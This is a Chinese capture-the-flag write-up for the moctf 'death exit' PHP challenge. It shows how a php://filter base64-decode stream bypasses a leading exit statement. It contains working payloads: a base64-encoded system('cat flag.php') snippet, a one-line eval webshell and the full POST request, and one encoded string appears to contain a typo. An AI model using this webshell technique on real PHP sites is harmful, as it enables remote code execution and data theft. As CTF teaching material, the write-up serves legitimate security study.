php://filter是PHP语言中特有的协议流,作用是作为一个“中间流”来处理其他流。比如,我们可以用如下一行代码将POST内容转换成base64编码并输出
file=php://filter/write=convert.base64-decode/resource=xxx.php
file=php://filter/read=convert.base64-encode/resource=xxx.php
以下是2018年moctf一道 死亡退出的题
查看源码:<?php exit;?>写在了最前面;说明当代码执行到这里会使代码直接退出,不会执行后续代码。所以我们要绕过这里!
先来分析下后续代码: 先给$c用post方法传递一个参数 此处的@是屏蔽错误提示的意思,后 file_put_contents
是把数据写入文件中。 这里绕过<?php exit ?>可以通过使用协议流的方法使用base64编码,绕过。
既:file=php://filter/write=convert.base64-decode/resource=tmp.php
接下来构造传入的字符串c:
(看了好多博客,发现他们给c传入的值都是<?php system('cat flag.php'); ?>)之所以都传他,是因为 题目说了flag在flag.php里面,所以写马。将<?php system('cat flag.php'); ?>
转化为base64编码如下:
c=aPD9waHAgc3lzdGVtKCdjYXQ1gZmxhZy5waHAnKTsgPz4=
而我自己写的时候,用的是构造了一句话木马,传入。
(目前还不清楚为啥都可以,难道是php文本的都可以?)
<?php @eval($_POST['c']);?>
转为base64编码传入:
c=aPD9waHAgQGV2YWwoJF9QT1NUWydjJ10pOz8+
因为phpexit一共7个字符,因为base64算法解码时是4个byte一组,所以给他增加1个“a”一共8个字符。这样,"phpexita"被正常解码,而后面我们传入的webshell的base64内容也被正常解码。
所以用post传入数据 :c=aPD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTsgPz4=&file=php://filter/write=convert.base64-decode/resource=tmp.php
后抓包运行即可!!!!!
参考文本:https://www.leavesongs.com/PENETRATION/php-filter-magic.html#xxe
171
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
